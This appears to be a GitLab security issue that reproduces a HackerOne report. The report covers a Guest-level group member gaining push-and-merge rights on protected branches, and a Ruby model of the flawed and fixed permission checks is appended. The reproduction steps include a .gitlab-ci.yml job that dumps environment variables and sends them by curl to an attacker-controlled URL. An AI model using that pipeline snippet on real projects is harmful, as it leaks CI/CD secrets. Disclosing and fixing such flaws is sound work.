Unauthorized member can gain `Allowed to push and merge` access and affect integrity of protected branches

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2104540 by theluci on 2023-08-09, assigned to GitLab Team:

Report

Hello,

I found that when a group is granted Allowed to push and merge access to the protected branch of a project, it is not checked whether the member gaining Allowed to push and merge access is at least a Developer in the granted group, but only whether the member has a max role of Developer in the project or not.

Background

GitLab provides a PREMIUM/ULTIMATE feature to grant specific groups or specific users Allowed to merge and Allowed to push and merge access on protected branches.

2aug-1.png

When a specific user is being granted Allowed to push and merge access, only users with at least the Developer role are shown and can be granted the above access.

2aug-2.png

2aug-5.png

Similarly, when a group is granted Allowed to push and merge access to the protected branch of a project, only the members of the group with at least the Developer role are granted the above access.

Vulnerability

When a group is granted Allowed to push and merge access to the protected branch of a project, it is not checked whether the user gaining Allowed to push and merge access is at least a Developer in the granted group. It is only checked whether the user:

a) Is a member of the granted group
b) Has a maximum role of Developer in the project

Due to this, the following attack is possible:

  1. victim is the Owner of victim-project.
  2. attacker is a Developer of victim-project.
  3. victim goes to https://gitlab.com/<victim-group>/<victim-project>/-/project_members and adds granted-group as Developer.
  4. victim goes to https://gitlab.com/<victim-group>/<victim-project>/-/settings/repository, Expand Protected branches and grants Allowed to push and merge access to granted-group.

victim expects that only the members of the granted-group with at least the Developer role are granted the above access.

  5. attacker is successful in joining the granted-group as a Guest.

As attacker and victim are already working on victim-project together, it will be quite easy and quite possible for attacker to join granted-group as a Guest.

  6. attacker automatically gains Allowed to push and merge access on the protected branch.

victim has no idea that attacker has gained Allowed to push and merge access on the protected branch.

  7. attacker can use this access to:

    a) Affect the integrity of the protected branch
    b) Upload a malicious .gitlab-ci.yml file to leak the project and parent group’s CI/CD variables

Steps to reproduce

  1. victim creates a group victim-group and activates Ultimate trial.

  2. victim creates a project victim-project inside victim-group.

  3. victim goes to https://gitlab.com/<victim-group>/<victim-project>/-/project_members and adds attacker as Developer.

  4. victim creates a group granted-group.

  5. victim goes to granted-group membership page https://gitlab.com/groups/<granted-group>/-/group_members and adds victim-member as Developer.

  6. victim goes to victim-project membership page https://gitlab.com/<victim-group>/<victim-project>/-/project_members and invites granted-group as Developer.

  7. victim goes to https://gitlab.com/<victim-group>/<victim-project>/-/settings/repository, Expand Protected branches and grants Allowed to push and merge access to granted-group.

victim expects that only the members of the granted-group with at least the Developer role are granted the above access.

  8. victim goes to granted-group membership page https://gitlab.com/groups/<granted-group>/-/group_members and adds attacker as Guest.

As attacker and victim are already working on victim-project together, it will be quite easy and quite possible for attacker to join granted-group as a Guest.

  9. attacker automatically gains Allowed to push and merge access on the protected branch.

victim has no idea that attacker has gained Allowed to push and merge access on the protected branch.

  10. attacker can use this access to affect the integrity of the protected branch:
    • attacker can create a new file using the + symbol.
    • attacker may choose to edit an existing file or delete an existing file.
  11. attacker can also use this access to upload a malicious .gitlab-ci.yml file with the following content:

job_name:
  script:
    - export > test.txt
    - curl -X POST --data "$(cat test.txt)" attacker-controlled-url

This leaks the project and parent group's CI/CD variables, affecting Confidentiality.
(While testing this, make sure victim has added some CI/CD variables in victim-project and victim-group.)

POC

9aug-2.mp4

Output of checks

This bug happens on GitLab.com (probably on instances too).

Impact

Unauthorized member can gain Allowed to push and merge access on protected branches and use this access to:

  1. Affect the Integrity of the protected branches.
  2. Upload a malicious .gitlab-ci.yml file to leak the project and parent group’s CI/CD variables affecting Confidentiality.
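The flaw the report describes is a missing authorization condition: the group-level grant is evaluated on group membership alone rather than on the member's role in that group. The following Ruby sketch is an added illustration, not GitLab's code; the role constants, the `PROJECT` and `GROUP_MEMBERS` fixture and every method name are constructed for this example. It models only the group grant on the protected branch (not the default push rights of Maintainers) and contrasts the check as reported with the check the documented behaviour implies, using the report's own actors.

```ruby
# Toy model of the protected-branch "Allowed to push and merge" decision.
# Added illustration only: constants, fixture and method names are invented.

module Roles
  GUEST      = 10
  REPORTER   = 20
  DEVELOPER  = 30
  MAINTAINER = 40
end

# Constructed fixture mirroring the report: attacker is a Developer in the
# project but only a Guest in the group that received the push grant.
GROUP_MEMBERS = {
  'granted-group' => {
    'victim-member' => Roles::DEVELOPER,
    'attacker'      => Roles::GUEST
  }
}.freeze

PROJECT = {
  direct_members:      { 'victim' => Roles::MAINTAINER, 'attacker' => Roles::DEVELOPER },
  # granted-group is invited to the project as Developer (access capped at that level)
  shared_groups:       { 'granted-group' => Roles::DEVELOPER },
  # the protected branch grants "Allowed to push and merge" to this group
  push_granted_groups: ['granted-group']
}.freeze

# Effective project role: the highest of direct membership and any invited-group
# membership, where invited-group access is capped at the invite level.
def project_access_level(project, user)
  levels = [project[:direct_members][user]]
  project[:shared_groups].each do |group, cap|
    group_level = GROUP_MEMBERS.dig(group, user)
    levels << [group_level, cap].min if group_level
  end
  levels.compact.max
end

# Check as the report describes it: any member of a granted group passes,
# as long as the user is at least Developer somewhere in the project.
def flawed_can_push?(project, user)
  level = project_access_level(project, user)
  return false unless level && level >= Roles::DEVELOPER

  project[:push_granted_groups].any? do |group|
    GROUP_MEMBERS.fetch(group, {}).key?(user)
  end
end

# Check matching the documented expectation: the user must additionally hold
# at least the Developer role inside the granted group itself.
def fixed_can_push?(project, user)
  level = project_access_level(project, user)
  return false unless level && level >= Roles::DEVELOPER

  project[:push_granted_groups].any? do |group|
    (GROUP_MEMBERS.dig(group, user) || 0) >= Roles::DEVELOPER
  end
end

if __FILE__ == $PROGRAM_NAME
  %w[victim-member attacker victim].each do |user|
    puts format('%-14s flawed=%-5s fixed=%s', user,
                flawed_can_push?(PROJECT, user), fixed_can_push?(PROJECT, user))
  end
end
```

Running the block shows the difference on the reported scenario: `victim-member` is allowed under both rules, `attacker` is allowed only under the flawed rule, and `victim` (not a member of granted-group at all) is denied by both, since only the group grant is modelled here. A regression test for the fix would assert exactly the `attacker` row.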

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: